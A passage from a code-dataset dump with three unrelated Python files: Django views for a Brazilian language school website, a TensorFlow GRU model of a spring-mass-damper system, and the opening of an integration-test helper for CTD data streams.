now = datetime.datetime.now().strftime('%H')\n now = int(now)\n try:\n eventoObj1 = eventoModel.objects.latest('id')\n tituloEvento1 = eventoObj1.titulo\n descBreveEvento1 = eventoObj1.descricao\n dataEvento1 = eventoObj1.data_evento\n diaEvento1 = dataEvento1.strftime(\"%d\")\n mesEvento1 = dataEvento1.strftime(\"%B\")\n evento2 = int(eventoObj1.id) - 1\n except:\n eventoObj1 = None\n tituloEvento1 = None\n descBreveEvento1 = None\n diaEvento1 = None\n mesEvento1 = None\n evento2 = None\n \n try:\n eventoObj2 = eventoModel.objects.get(id=evento2)\n tituloEvento2 = eventoObj2.titulo\n descBreveEvento2 = eventoObj2.descricao\n dataEvento2 = eventoObj2.data_evento\n diaEvento2 = dataEvento2.strftime(\"%d\")\n mesEvento2 = dataEvento2.strftime(\"%B\")\n evento3 = int(eventoObj2.id) - 1\n except:\n eventoObj2 = None\n tituloEvento2 = None\n descBreveEvento2 = None\n diaEvento2 = None\n mesEvento2 = None\n evento3 = None\n \n try:\n eventoObj3 = eventoModel.objects.get(id=evento2)\n tituloEvento3 = eventoObj3.titulo\n descBreveEvento3 = eventoObj3.descricao\n dataEvento3 = eventoObj3.data_evento\n diaEvento3 = dataEvento3.strftime(\"%d\")\n mesEvento3 = dataEvento3.strftime(\"%B\")\n except:\n eventoObj3 = None\n tituloEvento3 = None\n descBreveEvento3 = None\n diaEvento3 = None\n mesEvento3 = None\n return render(request, 'site/home.html', {'title': 'Home',\n 'tituloEvento1': tituloEvento1,\n 'descBreveEvento1': descBreveEvento1,\n 'diaEvento1': diaEvento1,\n 'mesEvento1': mesEvento1,\n 'eventoObj1':eventoObj1,\n 'tituloEvento2': tituloEvento2,\n 'descBreveEvento2': descBreveEvento2,\n 'diaEvento2': diaEvento2,\n 'mesEvento2': mesEvento2,\n 'eventoObj2':eventoObj2,\n 'tituloEvento3': tituloEvento3,\n 'descBreveEvento3': descBreveEvento3,\n 'diaEvento3': diaEvento3,\n 'mesEvento3': mesEvento3,\n 'eventoObj3':eventoObj3})\n\n\ndef cursos(request):\n return render(request, 'site/cursos.html', {'title': 'Cursos'})\n\ndef kids(request):\n return render(request, 'site/cursos/kids.html', {'title': 'Kids'})\n\ndef adult(request):\n return render(request, 'site/cursos/adult.html', {'title': 'Adult'})\n\ndef business(request):\n return render(request, 'site/cursos/business.html', {'title': 'Business'})\n\ndef inCompany(request):\n return render(request, 'site/cursos/inCompany.html', {'title': 'In Company'})\n\ndef testPreparation(request):\n return render(request, 'site/cursos/testPreparation.html', {'title': 'Test Preparation'})\n\ndef vip(request):\n return render(request, 'site/cursos/vip.html', {'title': 'VIP'})\n\ndef unidades(request):\n return render(request, 'site/unidades.html', {'title': 'Unidades'})\n\ndef tresLagoas(request):\n return render(request, 'site/tresLagoas.html', {'title': 'Três Lagoas'})\n\ndef aguaClara(request):\n return render(request, 'site/aguaClara.html', {'title': 'Água Clara'})\n\ndef ribasRioPardo(request):\n return render(request, 'site/ribasRioPardo.html', {'title': 'Ribas do Rio Pardo'})\n\ndef parceiros(request):\n return render(request, 'site/parceiros.html', {'title': 'Parceiros'})\n\ndef indiqueParceiro(request):\n if request.method == 'POST':\n nome = request.POST.get('nome')\n sobrenome = request.POST.get('sobrenome')\n empresa = request.POST.get('empresa')\n email = request.POST.get('email')\n telefone = request.POST.get('telefone')\n mensagem = request.POST.get('mensagem')\n novaIndicacao = indicacao(nome=nome, empresa=empresa, sobrenome=sobrenome, email=email, telefone=telefone, mensagem=mensagem)\n novaIndicacao.save()\n\n msgEmail = \"Contato recebido via website. \\n\\n\\n NOME:\\n\" + nome +\"\\n\\nEMPRESA:\\n\" + empresa + \"\\n\\nTELEFONE:\\n\"+ telefone +\"\\n\\nE-MAIL:\\n\"+ email + \"\\n\\nMENSAGEM:\\n\" + mensagem + \"\\n\\n\\nEssa mensagem foi gerada automaticamente, não responta.\"\n testeEmail = EmailMessage('Contato website - INDICAÇÃO PARCEIRO', msgEmail, to=['winnercallan@uol.com.br'])\n testeEmail.send()\n\n #client = Client() \n #from_whatsapp_number='whatsapp:+5567991865754'\n #to_whatsapp_number='whatsapp:+5567991865754'\n #message = client.messages.create(body='Check out this owl!',\n # from_=from_whatsapp_number,\n # to=to_whatsapp_number)\n\n msgConfirmação = \"Indicação enviada com sucesso!\"\n return render(request, 'site/home.html', {'title': 'Home', 'msgConfirmação':msgConfirmação})\n return render(request, 'site/indiqueParceiro.html', {'title': 'Indique Parceiros'})\n\ndef testeNivelamentoView(request):\n contador = 0\n if request.method == \"POST\" and request.POST.get('nome') != None:\n nome = request.POST.get('nome')\n email = request.POST.get('email')\n telefone = request.POST.get('telefone')\n novoTesteNivelamento = testeNivelamento(nome=nome, email=email, telefone=telefone)\n novoTesteNivelamento.save()\n perguntaObj = perguntaModel.objects.filter(estado=1).order_by('?')[0]\n pergExecutadas = perguntasExecutadas(pergunta=perguntaObj.id)\n pergExecutadas.save()\n novoTesteNivelamento.executadas.add(pergExecutadas)\n novoTesteNivelamento.save()\n contador = contador + 1\n respostas = perguntaObj.respostas.all()\n respostasList = list(respostas)\n shuffle(respostasList)\n return render(request, 'site/finalNivelamento.html', {'title': 'Nivelamento',\n 'perguntaObj':perguntaObj,\n 'contador':contador,\n 'respostas':respostas,\n 'respostasList':respostasList,\n 'testeNivelamentoObj':novoTesteNivelamento})\n return render(request, 'site/nivelamento.html', {'title': 'Nivelamento'})\n\n\ndef PerguntasNivelamento(request):\n if request.method == \"POST\" and request.POST.get('contador') != None and request.POST.get('testeNivelamentoID') != None:\n contador = request.POST.get('contador')\n if int(contador) < 20:\n testeNivelamentoID = request.POST.get('testeNivelamentoID')\n perguntaID = request.POST.get('perguntaID')\n respostaID = request.POST.get('respostaID')\n testeNivelamentoObj = testeNivelamento.objects.get(id=testeNivelamentoID)\n perguntaObj = perguntaModel.objects.get(id=perguntaID)\n respostaObj = respostaModel.objects.get(id=respostaID)\n novaRespostaObj = respostaNivelamento(pergunta= perguntaObj, resposta=respostaObj)\n novaRespostaObj.save()\n testeNivelamentoObj.respostas.add(novaRespostaObj)\n testeNivelamentoObj.save()\n pergExecutadas = perguntasExecutadas(pergunta=perguntaObj.id)\n pergExecutadas.save()\n testeNivelamentoObj.executadas.add(pergExecutadas)\n testeNivelamentoObj.save()\n perguntasExecList = []\n for p in testeNivelamentoObj.executadas.all():\n perguntasExecList.append(p.pergunta)\n contador = int(contador) + 1\n perguntaObjeto = perguntaModel.objects.filter(estado=1).exclude(id__in=perguntasExecList).order_by('?')[0]\n\n respostas = perguntaObjeto.respostas.all()\n respostasList = list(respostas)\n shuffle(respostasList)\n return render(request, 'site/perguntas.html', {'title': 'Nivelamento',\n 'contador':contador,\n 'testeNivelamentoObj':testeNivelamentoObj,\n 'respostasList':respostasList,\n 'perguntaObj':perguntaObjeto})\n if int(contador) >= 20:\n testeNivelamentoID = request.POST.get('testeNivelamentoID')\n perguntaID = request.POST.get('perguntaID')\n respostaID = request.POST.get('respostaID')\n testeNivelamentoObj = testeNivelamento.objects.get(id=testeNivelamentoID)\n perguntaObj = perguntaModel.objects.get(id=perguntaID)\n respostaObj = respostaModel.objects.get(id=respostaID)\n novaRespostaObj = respostaNivelamento(pergunta= perguntaObj, resposta=respostaObj)\n novaRespostaObj.save()\n testeNivelamentoObj.respostas.add(novaRespostaObj)\n testeNivelamentoObj.save()\n pergExecutadas = perguntasExecutadas(pergunta=perguntaObj.id)\n pergExecutadas.save()\n testeNivelamentoObj.executadas.add(pergExecutadas)\n testeNivelamentoObj.save()\n perguntasExecList = []\n for p in testeNivelamentoObj.executadas.all():\n perguntasExecList.append(p.pergunta)\n contador = int(contador) + 1\n perguntaObjeto = perguntaModel.objects.filter(estado=1).order_by('?')[0]\n\n respostas = perguntaObjeto.respostas.all()\n respostasList = list(respostas)\n shuffle(respostasList)\n msgConfirmacao = \"FINALIZAR AQUI MESMO\"\n return render(request, 'site/finalNivelamento.html', {'title': 'Nivelamento',\n 'contador':contador,\n 'testeNivelamentoObj':testeNivelamentoObj,\n 'respostasList':respostasList,\n 'perguntaObj':perguntaObjeto,\n 'msgConfirmacao':msgConfirmacao})\n return render(request, 'site/nivelamento.html', {'title': 'Nivelamento'})\n\ndef viewContato(request):\n if request.method == 'POST':\n nome = request.POST.get('nome')\n sobrenome = request.POST.get('sobrenome')\n email = request.POST.get('email')\n telefone = request.POST.get('telefone')\n mensagem = request.POST.get('mensagem')\n novoContato = contato(nome=nome, sobrenome=sobrenome, email=email, telefone=telefone, mensagem=mensagem)\n novoContato.save()\n msgEmail = \"Contato recebido via website. \\n\\n\\n NOME:\\n\" + nome + \" \" + sobrenome +\"\\n\\nTELEFONE:\\n\"+ telefone +\"\\n\\nE-MAIL:\\n\"+ email + \"\\n\\nMENSAGEM:\\n\" + mensagem + \"\\n\\n\\nEssa mensagem foi gerada automaticamente, não responta.\"\n testeEmail = EmailMessage('Contato website - CONTATO', msgEmail, to=['winnercallan@uol.com.br'])\n testeEmail.send()\n \n confirmacao = \"Mensagem enviada com sucesso!\"\n return render(request, 'site/contato.html', {'title': 'Contato', 'confirmacao': confirmacao})\n \n return render(request, 'site/contato.html', {'title': 'Contato'})\n\ndef entrar(request):\n if request.user.is_authenticated:\n alunoVisivel = False\n colaboradorVisivel = False\n classeVisivel = False\n aulasVisivel = False\n contasVisivel = False\n caixaVisivel = False\n estoqueVisivel = False\n controleVisivel = False\n now = datetime.datetime.now().strftime('%H')\n now = int(now)\n msgTelaInicial = \"Olá, \" + request.user.get_short_name() \n if now >= 4 and now <= 11:\n msgTelaInicial = \"Bom dia, \" + request.user.get_short_name() \n elif now > 11 and now < 18:\n msgTelaInicial = \"Boa Tarde, \" + request.user.get_short_name() \n elif now >= 18 and now < 4:\n msgTelaInicial = \"Boa Tarde, \" + request.user.get_short_name()\n \n return render (request, 'gerencia/home.html', {'title':'Home', \n 'alunoVisivel':alunoVisivel,\n 'colaboradorVisivel':colaboradorVisivel, \n 'classeVisivel':classeVisivel, \n 'aulasVisivel':aulasVisivel, \n 'contasVisivel':contasVisivel, \n 'caixaVisivel':caixaVisivel, \n 'estoqueVisivel':estoqueVisivel, \n 'controleVisivel':controleVisivel,\n 'msgTelaInicial':msgTelaInicial})\n return render (request, 'site/login.html', {'title':'Login'})\n\ndef instituicao(request):\n return render(request, 'site/instituicao.html', {'title': 'Instituicao'})\n\ndef metodo(request):\n return render(request, 'site/metodo.html', {'title': 'Metodo'})\n\ndef colaboradores(request):\n return render(request, 'site/colaboradores.html', {'title': 'Colaboradores'})\n\ndef viewRegistro(request):\n if request.method == \"POST\" and request.POST.get('emailRegistro') != \"\":\n emailRegistro = request.POST.get('emailRegistro')\n novoRegistro = registro(email=emailRegistro)\n novoRegistro.save()\n return render(request, 'site/registro.html', {'title': 'Receber novidades...'})\n return render(request, 'site/registro.html', {'title': 'Receber novidades...'})\n\ndef error_404(request, exception):\n return render(request, 'site/404.html', {'title': 'Error'})\n\ndef error_500(request):\n return render(request, 'site/500.html', {'title': 'Error'})","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"162602538","text":"import tensorflow as tf\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\nimport numpy as np\r\nimport linear_system_function as lsf\r\nimport matplotlib.pyplot as plt\r\nimport copy\r\n\r\n\r\n\"过程说明及样本构造\" \\\r\n'''\r\n#系统有质量分别为m1,m2,m3的小车构成,m1通过并联的k1弹簧、c1阻尼器与墙壁相连\r\n#m2通过并联的k2弹簧、c2阻尼器与m1相连,m3通过并联的k3弹簧、c3阻尼器与m2相连,为方便起见m1=k1=c1=1,m2=k2=c2=2,m3=k3=c3=3,\r\n\r\n'''\r\n\r\n\r\n\r\n#计算100s内的位移情况,计算步长为0.01s\r\ndt=0.1\r\nt=np.array(np.linspace(0.1,100,1000))#此处定义步长,总步数要与lsf funtion里对应上\r\nstep_number=800\r\n\r\n\r\n#F1与F3输入\r\n# F1=np.array(np.zeros(1000,))\r\n# for i in range(0,100,2):\r\n# F1[i*10:(i+1)*10]=-50\r\n#\r\n# # F1=t*0\r\n#\r\n# F3=5*np.sin(t)-t\r\n\r\nF3=(t/5.0)*np.sin(t)\r\n\r\nF1=np.array(np.linspace(0,10,1000))\r\nF1[400:600]=0\r\n\r\n\r\n#调用函数计算三段曲线,即调用函数求解常系数线性微分方程\r\nx1,x2,x3=lsf.data(F1,F3)\r\n\r\n#定义标准化矩阵的函数\r\ndef standardization(data):\r\n mu = np.mean(data, axis=0)\r\n sigma = np.std(data, axis=0)\r\n return (data - mu) / sigma\r\n\r\n#X和F由于量纲原因,数值大小差距比较大,故标准化数据\r\nx1=standardization(x1)\r\nx2=standardization(x2)\r\nx3=standardization(x3)\r\nF1=standardization(F1)\r\nF3=standardization(F3)\r\n\r\n\r\n\r\n#绘制x1 x2 x3 三段位移曲线,绘制F1,F3两段载荷曲线\r\nplt.subplot(511)\r\nplt.plot(t,x1,label='x1')\r\nplt.title('x1_curve')\r\nplt.subplot(512)\r\nplt.plot(t,x2,label='x2')\r\nplt.title('x2_curve')\r\nplt.subplot(513)\r\nplt.plot(t,x3,label='x3')\r\nplt.title('x3_curve')\r\nplt.subplot(514)\r\nplt.plot(t,F1,label='F1')\r\nplt.title('F1_curve')\r\nplt.subplot(515)\r\nplt.plot(t,F3,label='F3')\r\nplt.title('F3_curve')\r\n\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\"这里构造数据集,训练集每次输入的格式为10个数据,即前5个时刻的F1,F3输入\"\r\n\"训练集的结果输入格式为第5个时刻的x1,x2,x3\"\r\n\r\ndata=np.zeros((step_number,30),dtype=float)#定义具有(800,30)格式的初始数组\r\nfor i in range(step_number):\r\n data[i]=np.array([x1[i+2],x2[i+2],x3[i+2],\r\n x1[i+3], x2[i+3], x3[i+3],\r\n x1[i+4], x2[i+4], x3[i+4],\r\n x1[i+5], x2[i+5], x3[i+5],\r\n x1[i+6], x2[i+6], x3[i+6],\r\n F1[i], 0.,F3[i],\r\n F1[i + 1], 0.,F3[i + 1],\r\n F1[i + 2], 0.,F3[i + 2],\r\n F1[i + 3], 0.,F3[i + 3],\r\n F1[i + 4], 0.,F3[i + 4]])\r\n #这里每个temp为一个样本,想法是先让网络看i+2--i+6时刻的x1,x2,x3初值,\r\n # 然后再依次看i---i+4时刻的F1 和 F3的值,观察是否能学习会微分方程\r\n\r\ndata_random=copy.copy(data)\r\nnp.random.shuffle(data_random)#打乱data顺序,这里data维度(800,30)\r\nprint(np.shape(data_random))\r\n\r\n#构造训练集\r\n\r\n#训练集输入\r\ndata_x=np.zeros((step_number,5,3),dtype=float)#定义如(8000,5,3)的格式\r\nfor i in range(step_number):\r\n data_x[i]=[data_random[i][15:18],\r\n data_random[i][18:21],\r\n data_random[i][21:24],\r\n data_random[i][24:27],\r\n data_random[i][27:30]]\r\n\r\n#训练集输出\r\ndata_y=np.zeros((step_number,5,3),dtype=float)#定义如(8000,5,3)的格式\r\nfor i in range(step_number):\r\n data_y[i]=[data_random[i][0:3],\r\n data_random[i][3:6],\r\n data_random[i][6:9],\r\n data_random[i][9:12],\r\n data_random[i][12:15]]\r\n\r\n\r\nprint(np.shape(data_x))\r\nprint(data_x[1])\r\n\r\n\r\n\"tensorflow 组建rnn网络部分\"\r\n\r\n\r\n#输入数组是7*3\r\n# 序列段长度,即是几步\r\ntime_step = 5\r\n# 隐藏层节点数目,每个LSTM内部神经元数量\r\nrnn_unit = 50\r\n# cell层数\r\ngru_layers = 3\r\n# 序列段批处理数目\r\nbatch_size = 50\r\n# batch数目\r\nn_batch=step_number//batch_size\r\n# 输入维度\r\ninput_size = 3\r\n# 输出维度\r\noutput_size = 3\r\n# 学习率\r\nlr = 0.1\r\n#前置网络的隐藏层神经元数量\r\nhidden_size=20\r\n\r\n#输出层网络的隐藏层神经元数量\r\nout_hidden_size=10\r\n\r\n#这里的none表示第一个维度可以是任意值\r\nx=tf.placeholder(tf.float32,[None,time_step, input_size])#\r\ny=tf.placeholder(tf.float32,[None, time_step, output_size])\r\n\r\n\r\n\r\n#定义输入输出权值及偏置值\r\n'同时注明一点,这里的bias及weights的写法必须要是这样,后面的saver函数才能正常调用'\r\nweights = {\r\n 'in': tf.Variable(tf.random_normal([input_size, hidden_size])),\r\n 'in_hidden': tf.Variable(tf.random_normal([hidden_size, rnn_unit])),\r\n 'out_hidden': tf.Variable(tf.random_normal([rnn_unit, out_hidden_size])),\r\n 'out': tf.Variable(tf.constant(0.1, shape=[out_hidden_size, output_size]))\r\n}\r\nbiases = {\r\n 'in': tf.Variable(tf.random_normal([hidden_size])),\r\n 'in_hidden': tf.Variable(tf.random_normal([rnn_unit])),\r\n 'out_hidden': tf.Variable(tf.random_normal([out_hidden_size])),\r\n 'out': tf.Variable(tf.constant(0.1, shape=[output_size]))\r\n}\r\n\r\n\r\n'''\r\n结论上来说,如果cell为LSTM,那 state是个tuple,分别代表Ct 和 ht,其中 ht与outputs中的对应的最后一个时刻的输出相等,\r\n假设state形状为[ 2,batch_size, cell.output_size ],outputs形状为 [ batch_size, max_time, cell.output_size ],\r\n那么state[ 1, batch_size, : ] == outputs[ batch_size, -1, : ];如果cell为GRU,那么同理,state其实就是 ht,state ==outputs[ -1 ]\r\n'''\r\n\r\ndef lstm(batch):\r\n\r\n # 定义输入的权值及偏置值\r\n w_in = weights['in']\r\n b_in = biases['in']\r\n\r\n w_hidden = weights['in_hidden']\r\n b_hidden = biases['in_hidden']\r\n\r\n\r\n # 对输入rnn网络的数据做前置处理\r\n input = tf.reshape(x, [-1, input_size]) #x被置位(bacth_size*time_step,input_size) 的格式(250,3),由于是三维数组无法直接乘,需要进行处理\r\n\r\n\r\n #前置网络的隐藏层处理\r\n input_hidden=tf.nn.sigmoid(tf.matmul(input, w_in) + b_in)\r\n\r\n input_rnn = tf.nn.sigmoid(tf.matmul(input_hidden, w_hidden) + b_hidden)\r\n\r\n input_rnn = tf.reshape(input_rnn, [-1, time_step, rnn_unit])#这里是真实输入rnn网络格式的数据\r\n\r\n #定义GRU网络的参数\r\n GRU_cells = tf.nn.rnn_cell.MultiRNNCell([tf.nn.rnn_cell.GRUCell(rnn_unit) for _ in range(gru_layers)])\r\n\r\n init_state = GRU_cells.zero_state(batch, dtype=tf.float32)\r\n\r\n output_rnn, final_states = tf.nn.dynamic_rnn(GRU_cells, input_rnn, initial_state=init_state, dtype=tf.float32)\r\n\r\n output = tf.reshape(output_rnn, [-1, rnn_unit])\r\n\r\n print(tf.shape(output))\r\n\r\n # 定义输出权值及偏置值,并对LSTM的输出值做处理\r\n w_out_hidden=weights['out_hidden']\r\n b_out_hidden = biases['out_hidden']\r\n\r\n w_out = weights['out']\r\n b_out = biases['out']\r\n\r\n out_hidden=tf.nn.relu(tf.matmul(output,w_out_hidden)+b_out_hidden)\r\n pred = tf.matmul(out_hidden, w_out) + b_out\r\n\r\n return pred, final_states\r\n\r\n\r\n\r\ndef train_lstm():\r\n global batch_size\r\n with tf.variable_scope(\"sec_lstm\"):\r\n pred, _ = lstm(batch_size)\r\n\r\n loss = tf.reduce_mean(tf.square(tf.reshape(pred, [-1]) - tf.reshape(y, [-1])))\r\n train_op = tf.train.AdamOptimizer(lr).minimize(loss)\r\n\r\n #定义变量存储参数\r\n saver = tf.train.Saver(tf.global_variables())\r\n loss_list = []\r\n\r\n\r\n with tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer())\r\n for epoch in range(300): # We can increase the number of iterations to gain better result.\r\n\r\n for i in range(n_batch):\r\n\r\n _, loss_ = sess.run([train_op, loss], feed_dict={x: data_x[batch_size * i:batch_size * (i + 1)],\r\n y: data_y[batch_size * i:batch_size * (i + 1)]})\r\n\r\n loss_list.append(loss_)\r\n\r\n\r\n\r\n if epoch % 10 == 0:\r\n print(\"Number of epoch:\", epoch, \" loss:\", loss_list[-1])\r\n\r\n if epoch > 0 and loss_list[-2] > loss_list[-1]:\r\n saver.save(sess, 'model_save1\\\\modle.ckpt')\r\n\r\n\r\ntrain_lstm()#运行LSTM网络\r\n\r\n\r\n\r\n\r\n\"测试部分\"\r\n\r\n#测试集输入,\r\ntest_number=800\r\n\r\ntest_x=np.zeros((test_number,5,3),dtype=float)#定义如(800,5,3)的格式\r\nfor i in range(test_number):\r\n test_x[i]=[data[i][15:18],\r\n data[i][18:21],\r\n data[i][21:24],\r\n data[i][24:27],\r\n data[i][27:30]] #这里的test_x实则为F1 F3不同时刻输入的组合\r\n\r\nprint(np.shape(test_x))\r\n\r\n\r\n#用模型计算得出的输出\r\nwith tf.variable_scope(\"sec_lstm\", reuse=tf.AUTO_REUSE):\r\n pred, _ = lstm(1) #这里预测,所以输入的batch_size为1就可以\r\nsaver = tf.train.Saver(tf.global_variables())\r\nwith tf.Session() as sess:\r\n saver.restore(sess, 'model_save1\\\\modle.ckpt')\r\n\r\n\r\n#实际上有5组X1,X2,X3输出,仅仅在时间序列上有一定的偏差,这里分别绘制 查看区别\r\n predict_1_x1 = np.array([])\r\n predict_1_x2 = np.array([])\r\n predict_1_x3 = np.array([])\r\n\r\n predict_2_x1 = np.array([])\r\n predict_2_x2 = np.array([])\r\n predict_2_x3 = np.array([])\r\n\r\n predict_3_x1 = np.array([])\r\n predict_3_x2 = np.array([])\r\n predict_3_x3 = np.array([])\r\n\r\n predict_4_x1 = np.array([])\r\n predict_4_x2 = np.array([])\r\n predict_4_x3 = np.array([])\r\n\r\n predict_5_x1 = np.array([])\r\n predict_5_x2 = np.array([])\r\n predict_5_x3 = np.array([])\r\n\r\n\r\n for i in range(test_number):\r\n next_seq = sess.run(pred, feed_dict={x: [test_x[i]]}) #next_seq输出格式为(time_step,output_size),这里为(5,3,)\r\n np.array(next_seq)\r\n\r\n\r\n '输出的格式为【time_step,output_size】,这里time_step为5,每一个步骤都有x1 x2 x3的输出,即有5组x1 x2 x3输出' \\\r\n ''\r\n predict_1_x1=np.append(predict_1_x1,next_seq[0][0])\r\n predict_1_x2 = np.append(predict_1_x2, next_seq[0][1])\r\n predict_1_x3 = np.append(predict_1_x3, next_seq[0][2])\r\n\r\n predict_2_x1=np.append(predict_2_x1,next_seq[1][0])\r\n predict_2_x2 = np.append(predict_2_x2, next_seq[1][1])\r\n predict_2_x3 = np.append(predict_2_x3, next_seq[1][2])\r\n\r\n predict_3_x1=np.append(predict_3_x1,next_seq[2][0])\r\n predict_3_x2 = np.append(predict_3_x2, next_seq[2][1])\r\n predict_3_x3 = np.append(predict_3_x3, next_seq[2][2])\r\n\r\n predict_4_x1 = np.append(predict_4_x1, next_seq[3][0])\r\n predict_4_x2 = np.append(predict_4_x2, next_seq[3][1])\r\n predict_4_x3 = np.append(predict_4_x3, next_seq[3][2])\r\n\r\n predict_5_x1 = np.append(predict_5_x1, next_seq[4][0])\r\n predict_5_x2 = np.append(predict_5_x2, next_seq[4][1])\r\n predict_5_x3 = np.append(predict_5_x3, next_seq[4][2])\r\n\r\n\r\n\r\n\r\n\r\n #绘制图像\r\n plt.subplot(511)\r\n plt.plot(t, x1, label='x1')\r\n plt.plot(t[2:2+test_number], predict_1_x1, color='r')\r\n plt.plot(t[3:3 + test_number], predict_2_x1, color='g')\r\n plt.plot(t[4:4 + test_number], predict_3_x1)\r\n plt.plot(t[5:5 + test_number], predict_4_x1)\r\n\r\n\r\n plt.subplot(512)\r\n plt.plot(t, x2, label='x2')\r\n plt.plot(t[2:2+test_number], predict_1_x2, color='r')\r\n plt.plot(t[3:3 + test_number], predict_2_x2, color='g')\r\n plt.plot(t[4:4 + test_number], predict_3_x2)\r\n plt.plot(t[5:5 + test_number], predict_4_x2)\r\n\r\n\r\n plt.subplot(513)\r\n plt.plot(t, x3, label='x3')\r\n plt.plot(t[2:2+test_number], predict_1_x3, color='r')\r\n plt.plot(t[3:3 + test_number], predict_2_x3, color='g')\r\n plt.plot(t[4:4 + test_number], predict_3_x3, color='r')\r\n plt.plot(t[5:5 + test_number], predict_4_x3, color='g')\r\n\r\n\r\n plt.subplot(514)\r\n plt.plot(t, F1, label='F1')\r\n plt.subplot(515)\r\n plt.plot(t, F3, label='F2')\r\n\r\n plt.show()\r\n","sub_path":"时序神经网络模型/GRU网络+前置感知器模型.py","file_name":"GRU网络+前置感知器模型.py","file_ext":"py","file_size_in_byte":11764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"73871387","text":"from pyon.public import Container, log, IonObject\nfrom interface.objects import CouchStorage, ProcessDefinition\nfrom pyon.ion.stream import StandaloneStreamSubscriber\nfrom ion.services.dm.utility.granule_utils import time_series_domain\nfrom seawater.gibbs import SP_from_cndr\nfrom seawater.gibbs import cte\n\nfrom numpy.testing import assert_array_almost_equal\n\nfrom pyon.util.int_test import IonIntegrationTestCase\nfrom pyon.public import CFG, RT, LCS, PRED\nfrom pyon.core.exception import BadRequest, Inconsistent\n\nimport imghdr\nimport gevent\nimport numpy\nimport simplejson\nimport base64\nimport ast\n\nfrom interface.objects import Granule\nfrom ion.services.dm.utility.granule.record_dictionary import RecordDictionaryTool\nfrom pyon.util.containers import get_safe\nfrom seawater.gibbs import SP_from_cndr\nfrom seawater.gibbs import cte\n\n\nclass VisualizationIntegrationTestHelper(IonIntegrationTestCase):\n\n def on_start(self):\n super(VisualizationIntegrationTestHelper, self).on_start()\n\n\n def create_ctd_input_stream_and_data_product(self, data_product_name='ctd_parsed'):\n\n cc = self.container\n assertions = self.assertTrue\n\n #-------------------------------\n # Create CTD Parsed as the initial data product\n #-------------------------------\n # create a stream definition for the data from the ctd simulator\n ctd_pdict_id = self.datasetclient.read_parameter_dictionary_by_name('ctd_parsed_param_dict', id_only=True)\n ctd_stream_def_id = self.pubsubclient.create_stream_definition(name='Simulated CTD data', parameter_dictionary_id=ctd_pdict_id)\n\n\n log.debug('Creating new CDM data product with a stream definition')\n\n tdom, sdom = time_series_domain()\n\n dp_obj = IonObject(RT.DataProduct,\n name=data_product_name,\n description='ctd stream test',\n temporal_domain = tdom.dump(),\n spatial_domain = sdom.dump())\n\n ctd_parsed_data_product_id = self.dataproductclient.create_data_product(dp_obj, ctd_stream_def_id)\n self.addCleanup(self.dataproductclient.delete_data_product, ctd_parsed_data_product_id)\n\n log.debug('new ctd_parsed_data_product_id = %s' % ctd_parsed_data_product_id)\n\n #Only ever need one device for testing purposes.\n instDevice_obj,_ = self.rrclient.find_resources(restype=RT.InstrumentDevice, name='SBE37IMDevice')\n if instDevice_obj:\n instDevice_id = instDevice_obj[0]._id\n else:\n instDevice_obj = IonObject(RT.InstrumentDevice, name='SBE37IMDevice', description=\"SBE37IMDevice\", serial_number=\"12345\" )\n instDevice_id = self.imsclient.create_instrument_device(instrument_device=instDevice_obj)\n\n self.damsclient.assign_data_product(input_resource_id=instDevice_id, data_product_id=ctd_parsed_data_product_id)\n\n self.dataproductclient.activate_data_product_persistence(data_product_id=ctd_parsed_data_product_id)\n self.addCleanup(self.dataproductclient.suspend_data_product_persistence, ctd_parsed_data_product_id)\n\n # Retrieve the id of the OUTPUT stream from the out Data Product\n stream_ids, _ = self.rrclient.find_objects(ctd_parsed_data_product_id, PRED.hasStream, None, True)\n assertions(len(stream_ids) > 0 )\n ctd_stream_id = stream_ids[0]\n\n return ctd_stream_id, ctd_parsed_data_product_id\n\n def start_simple_input_stream_process(self, ctd_stream_id):\n return self.start_input_stream_process(ctd_stream_id)\n\n def start_sinusoidal_input_stream_process(self, ctd_stream_id):\n return self.start_input_stream_process(ctd_stream_id, 'ion.processes.data.sinusoidal_stream_publisher', 'SinusoidalCtdPublisher')\n\n def start_input_stream_process(self, ctd_stream_id, module = 'ion.processes.data.ctd_stream_publisher', class_name= 'SimpleCtdPublisher'):\n ###\n ### Start the process for producing the CTD data\n ###\n # process definition for the ctd simulator...\n producer_definition = ProcessDefinition()\n producer_definition.executable = {\n 'module':module,\n 'class':class_name\n }\n\n ctd_sim_procdef_id = self.process_dispatcher.create_process_definition(process_definition=producer_definition)\n\n # Start the ctd simulator to produce some data\n configuration = {\n 'process':{\n 'stream_id':ctd_stream_id,\n }\n }\n\n ctd_sim_pid = self.process_dispatcher.schedule_process(process_definition_id=ctd_sim_procdef_id, configuration=configuration)\n\n return ctd_sim_pid\n\n def start_output_stream_and_listen(self, ctd_stream_id, data_product_stream_ids, message_count_per_stream=10):\n assertions = self.assertTrue\n exchange_name = 'workflow_test'\n\n ###\n ### Make a subscriber in the test to listen for transformed data\n ###\n\n salinity_subscription_id = self.pubsubclient.create_subscription(\n name = 'test workflow transformations',\n exchange_name = exchange_name,\n stream_ids = data_product_stream_ids\n )\n\n result = gevent.event.AsyncResult()\n results = []\n message_count = len(data_product_stream_ids) * message_count_per_stream\n\n def message_received(message, stream_route, stream_id):\n # Heads\n results.append(message)\n if len(results) >= message_count: #Only wait for so many messages - per stream\n result.set(True)\n\n subscriber = StandaloneStreamSubscriber(exchange_name='workflow_test', callback=message_received)\n subscriber.xn.purge()\n self.addCleanup(subscriber.xn.delete)\n subscriber.start()\n\n # after the queue has been created it is safe to activate the subscription\n self.pubsubclient.activate_subscription(subscription_id=salinity_subscription_id)\n\n #Start the input stream process\n if ctd_stream_id is not None:\n ctd_sim_pid = self.start_simple_input_stream_process(ctd_stream_id)\n\n # Assert that we have received data\n assertions(result.get(timeout=60))\n\n # stop the flow parse the messages...\n if ctd_stream_id is not None:\n self.process_dispatcher.cancel_process(ctd_sim_pid) # kill the ctd simulator process - that is enough data\n\n self.pubsubclient.deactivate_subscription(subscription_id=salinity_subscription_id)\n\n subscriber.stop()\n\n return results\n\n\n def validate_messages(self, results):\n bin1 = numpy.array([])\n bin2 = 